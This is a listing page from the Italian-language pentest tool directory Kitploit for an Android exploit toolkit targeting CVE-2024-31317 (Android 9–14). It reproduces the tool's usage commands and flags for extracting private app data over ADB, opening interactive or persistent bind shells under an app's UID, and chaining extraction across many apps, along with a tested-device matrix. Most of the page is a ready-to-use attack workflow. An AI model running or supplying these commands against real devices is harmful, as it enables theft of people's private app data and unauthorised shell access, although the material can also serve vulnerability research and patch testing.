Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
zygote-CVE-2024-31317 — Questo è un toolkit che utilizza CVE-2024-31317 per estrarre dati privati delle app tramite ADB o avviare una shell con l'UID di un'app. | Kitploit
Strumenti/GitHubGitHub/vnescape/zygote-cve-2024-31317
Sicurezza AndroidAnalisi delle VulnerabilitàExploitEsfiltrazione DatiPenetration TestingSicurezza Mobile
GitHubvnescape/zygote-cve-2024-31317

zygote-CVE-2024-31317

Questo è un toolkit che utilizza CVE-2024-31317 per estrarre dati privati delle app tramite ADB o avviare una shell con l'UID di un'app.

Vedi Repository
312 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Zygote Toolkit - CVE-2024-31317

Questo è un toolkit che utilizza CVE-2024-31317 per estrarre dati privati delle app tramite ADB o per avviare una shell con l'UID di un'app. Questa vulnerabilità riguarda le versioni di Android dalla 9 alla 14 con livello di patch di sicurezza 2024-06-01 o inferiore. Di seguito è disponibile una matrice di supporto dei dispositivi testati.

Prerequisiti

Debian/Ubuntu (pacchetti di sistema)

root@kitploit:~
sudo apt update
sudo apt install adb openjdk-17-jdk-headless android-sdk android-sdk-build-tools
export ANDROID_HOME=/usr/lib/android-sdk
export PATH=$PATH:$ANDROID_HOME/build-tools/34.0.0:$ANDROID_HOME/platform-tools

Aggiungi le righe export a ~/.bashrc (o equivalente) per la persistenza.

Verifica

root@kitploit:~
./setup.sh

Avvio rapido

root@kitploit:~
# Build and install the carrier APK (auto-builds from source)
python3 cve_2024_31317.py com.google.android.youtube --setup --rebuild -y

# Extract an app's data directory
python3 cve_2024_31317.py -d DEVICE_SERIAL -E -o app_data.tar -y com.example.app

L'exploit compila tutto da Hijack.java e AndroidManifest.xml al primo avvio.

Utilizzo

root@kitploit:~
python3 cve_2024_31317.py [flags] [package]

Modalità

Opzioni

Esempi

root@kitploit:~
# Extraction
python3 cve_2024_31317.py -d DEVICE -E -o youtube.tar -y com.google.android.youtube

# Check if device is vulnerable
python3 cve_2024_31317.py -d DEVICE --check-vuln

# Interactive bind shell
python3 cve_2024_31317.py -d DEVICE -i -y com.google.android.youtube

# Persistent shell on port 7777
python3 cve_2024_31317.py -d DEVICE -S 7777 -y com.google.android.youtube

# Multi-app chain
python3 cve_2024_31317.py -d DEVICE -E -y --chain-targets "app1,app2,app3"

# Recovery only (fix boot loop)
python3 cve_2024_31317.py -d DEVICE --recover

Compilazione dal sorgente

Tutto viene compilato dal sorgente in fase di esecuzione. La pipeline di compilazione usa javac (JDK 17+), d8, aapt, zipalign e apksigner dell'Android SDK.

  • x86_64 → arm64: gli strumenti vengono eseguiti nativamente; l'output DEX è indipendente dall'architettura
  • ARM64 → arm64: tutto viene eseguito nativamente (Adoptium fornisce build JDK per ARM64)

Passcode

Se il dispositivo ha un passcode, parte in modalità BFU (prima del primo sblocco). L'exploit interroga sys.user.0.ce_available per un massimo di 5 minuti finché non sblocchi il dispositivo. Si consiglia di rimuovere il passcode per la durata dell'exploit.

Dispositivi testati

† Specifico di Samsung One UI: l'iniezione ZNJECT riesce e l'estrazione -E funziona, ma la shell bind ServerSocket di toybox nc non si apre mai. Sono necessarie ulteriori ricerche per trovare la causa principale del problema.

Recupero

Il payload rimasto in hidden_api_blacklist_exemptions può causare un boot loop al riavvio successivo. Esegui --recover per ripristinare:

root@kitploit:~
python3 cve_2024_31317.py -d DEVICE --recover
Scarica lo strumento
FlagDescrizione
-EEstrae i dati dell'app tramite tar | nc del processo nipote (sopravvive alla terminazione del processo padre)
-iShell bind interattiva REPL
-S PORTShell persistente (protocollo FIFO a porta singola)
--recoverReimposta l'impostazione, risolve il blocco all'avvio / il degrado di Zygote
--setupCompila e installa solo l'APK carrier (nessuna iniezione)
--list-appsElenca tutti i pacchetti installati con UID e tipo sys/user
--check-vulnControlla se il dispositivo è vulnerabile a CVE-2024-31317 ed esce
FlagDescrizione
-o file.tarPercorso di output per il tarball di estrazione
-y / --yesSalta le richieste di conferma
--retries NNumero massimo di tentativi per target (default 3)
--chain-targets "pkg1,pkg2"Estrae più app in una singola sessione
--chain-file file.jsonCome sopra, da file JSON
--reboot-afterRiavvia dopo l'estrazione (ripristina Zygote)
--reboot-every NRiavvia dopo ogni N target della catena
--coldSalta il warm-up; conserva il payload per il prossimo avvio dell'app
--port PORTPorta della shell bind (default 8888)
-d SERIALScegli un dispositivo specifico (quando più dispositivi sono collegati)
--rebuildForza la ricompilazione dell'APK carrier
DispositivoAndroidAPIPatchABI-E-i-S--chain--cold--retries--recover--reboot-after--list-apps--check-vulnPunteggio
Google Pixel 312312021-10-05arm64-v8a✅✅✅✅✅✅✅✅✅✅12/12
Samsung SM-P615 Tab S6 Lite13332024-05-01arm64-v8a✅❌†❌†✅✅❌†✅✅✅✅9/12
sdk_gphone_x86_64 (emulator)10292019-09-05x86_64✅✅✅✅✅✅✅✅✅✅12/12